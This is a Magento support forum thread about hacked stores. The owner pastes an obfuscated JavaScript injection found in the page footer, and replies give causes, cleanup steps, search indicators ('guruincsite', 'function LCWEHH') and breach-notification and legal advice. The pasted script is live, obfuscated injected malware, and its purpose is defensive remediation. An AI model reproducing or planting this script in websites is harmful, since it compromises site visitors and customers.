cancel
Showing results for 
Search instead for 
Did you mean: 

HELP - site hacked

SOLVED

HELP - site hacked

Hey guys, so essentially I am freaking out a little bit. I have clients on two separate servers who's magento site both got hacked. I am seeing malicious code right before the </body> tag. 

 

Does anyone have any idea of what steps to take to start to clean this out? I am at a major loss, I have checked tons of files but am not exactly sure what I am looking for, code wise. 

 

This is the code: 

 

<script>(function(){function LCWEHH(XHFER1){XHFER1=XHFER1["\u0073\u0070\u006c\u0069\u0074"]("");var F3R4XE=document["\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0073\u0042\u0079\u0054\u0061\u0067\u004e\u0061\u006d\u0065"]("\u0073\u0063\u0072\u0069\u0070\u0074")[document["\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0073\u0042\u0079\u0054\u0061\u0067\u004e\u0061\u006d\u0065"]("\u0073\u0063\u0072\u0069\u0070\u0074")["\u006c\u0065\u006e\u0067\u0074\u0068"]-1]["\u0069\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c"]["\u0073\u0070\u006c\u0069\u0074"]("\u000A"),MDNRTX=1+1+1-3,IFMIBA="",VYPXZ7="",A2S8FN=1-1;F3R4XE=F3R4XE[F3R4XE["\u006c\u0065\u006e\u0067\u0074\u0068"]-1]["\u006c\u0065\u006e\u0067\u0074\u0068"]+"";F3R4XE=F3R4XE["\u0073\u0070\u006c\u0069\u0074"]("");for(var i=1+1-1-1;i<XHFER1["\u006c\u0065\u006e\u0067\u0074\u0068"];i=i+2-1+1){if(F3R4XE["\u006c\u0065\u006e\u0067\u0074\u0068"]==MDNRTX){MDNRTX=1+1+1-3;}VYPXZ7=parseInt(XHFER1[i]+XHFER1[i+1],54-24)-F3R4XE[MDNRTX]["\u0063\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0041\u0074"](1-1+1-1)-A2S8FN;IFMIBA+=String["\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065"](VYPXZ7);A2S8FN=VYPXZ7;MDNRTX++}return IFMIBA}LCWEHH=LCWEHH("5e908r948q9e605j8t9b915n5o9f8r5e5d969g9d795b4s6p8t9h9f978o8p8s9590936l6k8j9670524p7490915l5f8r90878t917f7g8p8o8p8k9c605i8d937t7m8i8q8o8q959h7p828e7r8e7q7e8m8o5g5e9199918o9g7q7c8c8t99905a5i8l94989h7r7g8i8t8m5f5o92917q7k9i9e948c919h925a5d8j915h608t8p8t9f937b7k9i9e948c919h92")["\u0073\u0070\u006c\u0069\u0074"]("\u000A");(function(){var QW5A2W=document[LCWEHH[5-4+5-2]](LCWEHH[1+1-2]);var XL04JH=document[LCWEHH[4+2-1+0]](LCWEHH[1-2+2])[0];QW5A2W=XL04JH[LCWEHH[11-5]](QW5A2W,XL04JH[LCWEHH[15-8]]);QW5A2W[LCWEHH[7+15-14]](LCWEHH[4+3-5],LCWEHH[6+4+5-12]);if(!document[LCWEHH[15+2-8]]){QW5A2W[LCWEHH[13-3]](LCWEHH[2-4+1+3])}}())}());</script>

Any suggestions? Appreciate any help. 

 

Thanks

7 REPLIES

Re: HELP - site hacked

Here's what I stated in another topic which can be useful here as well:-

 

This can happen to any or all of the reasons below:-

  1. Your password for your hosting control panel or FTP may be stolen (can happen if your computer is infected with virus). 
  2. You are using an old version of Magento. 
  3. You didn't implement all the security patches for Magento. 
  4. You are using old or insecure extensions. 
  5. You are using old or insecure themes. 
  6. You have other applications like WordPress in the same hosting account and it's not updated to the latest version. 

What you need to do now is to clean up all the malwares in your hosting account. Here's a good guide to start:-

https://www.stopbadware.org/common-hacks

 

If you do not know how to clean up the malwares or do not have the time to do so, you can either:-

  1. Hire someone like a web developer or a third-party security company like Sucuri to clean it up for you. 
  2. Wipe everything clean and restore from a backup. 

Once cleaned up, you need to make sure that all applications, extensions and themes are constantly updated to the latest version or at least make sure that the Magento security patches are implemented. If you don't do this, you will be hacked again and again as the entry point for the hacker is not properly secured. 

James Lee | Moderator • Magento Master
See My Recommended Magento Hosting & Security Tips

Re: HELP - site hacked

Just had to clean a site up with this exact issue.

Once you are logged in check system -> configuration -> Design -> footer -> Miscellaneous HTML

 

Hope this helps Smiley Happy

Re: HELP - site hacked

I have the same malware script in my Footer Misc HTML field as you noted. What steps did you take to resolve?

Re: HELP - site hacked

Hi JLHC,

 

Though your answer is 100% correct, I was wondering if we could get more information from Magento with regards to what is getting done to confirm that this is an exploit of either a unpatched magento version or rather an exploit through one of the extensions they have installed. For example in this thread there seems to be no effort made to discover what version of Magento etc. Bstier is running, just a straight assumption that it is the users fault instead of gathering further information.

 

Please don't take this as an attack I am more looking for reasurance that something proactive is being done even if it is a security email to all Magento professionals giving them a heads up of this exploint that is affecting a number of magento sites.


Bstier to further check your vunerability I would suggest running your site through http://magereport.com, this site was mentioned in a security update email sent from Magento.


Regards

 

Re: HELP - site hacked

Hi QlikMarketAdmin,

 

remove it, with this attack you will also need to check your CMS Pages for either the phrase "guruincsite", or "function LCWEHH". The best why to do this would be to take a database bump and then do a search on that to be sure that you have checked every possible area. 

 

You should also as a start run your site through http://magereport.com to confirm that you are up to date with all security patches.

 

Please note this is just the start, as you have been compramised you will need to closely monitor your site to confirm that all security wholes have been dealt with.

 

Regards

 

 

 

Re: HELP - site hacked

Re: HELP - site hacked

I agree with the technical recommendations offered by the earlier answers, but I recently answered a couple of similar or at least related questions on the Magento Stack Exchange and thought I would follow up with some of the additional insights from a few more recent remediation efforts.

A security incident like this one is a challenge that must be addressed with responses from both the technical and business perspectives and given that the business implications include potential regulatory and contractual requirements that specifically impact the technical actions you may be required to perform, I thought I would outline them together in this answer.

 

Before performing any of the earlier recommended technical activities, review the following and determine which, if any, are allowed given the regulations you are subject to in your location and the contracts you have entered into with your issuing banks, gateway providers and processing service partners.

 

  1. You should first take some time to review the Official Magento Security Best Practices Guide. It contains a wealth of information to help you deal with a compromised installation as well as how to prevent it from happening in the future.

    It's based on the work of the Magento Security Team as well as knowledge shared by several Magento Security Experts both on Magento Stack Exchange and here in the Magento Community Forums.

  2. If this site generates any real volume of transactions, you should probably not attempt to resolve the issue completely on your own. Contact a Magento Security Expert who is familiar with all of the following:

    1) The specific Magento version you are running

    2) The laws covering Data Breaches, Privacy Protections, and Customer Notification Requirements that govern Merchants operating in and/or located in your geographical region.

    3) Reviewing contracts and business partner agreements with your Merchant's Gateway Provider, Processing Services, and Credit Card Companies

Depending on your location, you may be subject to local, regional, and / or national laws that require you to either perform very specific actions in response to a security event or to engage the assistance of someone (or a company) that is specifically licensed as a forensic information security specialist.

In addition, the fine print of the credit card processing agreements signed with the store's Credit Card Merchant Gateway, Financial Institution, Issuing Bank, and the Credit Companies themselves may require other specific actions be performed and that law enforcement be engaged or the store may be held responsible for any charges incurred by the attacker(s).

Finally, again, depending on your location, your store may be required by law to notify the customers of the data breach in very specific ways and the Nation / States in which your customers reside may impose additional requirements on notifying affected customers. Failure to comply with these requirements might make the store subject liable for fines and penalties outside of any costs imposed by your processing company or gateway provider.

These laws & contractual requirements vary greatly across different geographical regions and also across different financial institution and businesses that offer clearing and gateway services to merchants so it is important to engage the services of someone who is both a Magento Security Expert and also familiar with the laws specific to your geographic location and who can assist you with both the technical effort in remediating your hacked site as well as the business activities required by any contracts that have been entered into by the Merchant.

Once you have identified a suitably experienced partner to assist you in your remediation effort, ask them to confirm the next technical steps to take, including actions such as imaging the compromised system, contacting law enforcement, disconnecting the system from the network and investigating the affected systems.

REMEMBER: You are no longer in possession of JUST a hacked system! Your compromised Magento installation is now also an ACTIVE crime scene, and in many jurisdictions, the crime is a severe one. In the US, it's almost universally a felony (severe crime) with specific prohibitions against tampering with evidence left behind by the perpetuators of the criminal act without proper supervision of licensed personnel and/or law enforcement professionals.

It would be unwise to bring the system back to a working state only to find out that you YOURSELF had just committed a crime punishable by fine and/or jail time. Standard Disclaimer: I am not a lawyer and this does not constitute legal advice.

 

See Also:

 

 

Note: Most of the links above point to resources specifically written for US Merchants, but they all also contain links for merchants in other regions as well as contact information to engage the specific security support teams to assist you in your own location.

------------------------
Bryan "BJ" Hoffpauir - Contact me on my Blog!

Contact me at work via AOE - the open web company online!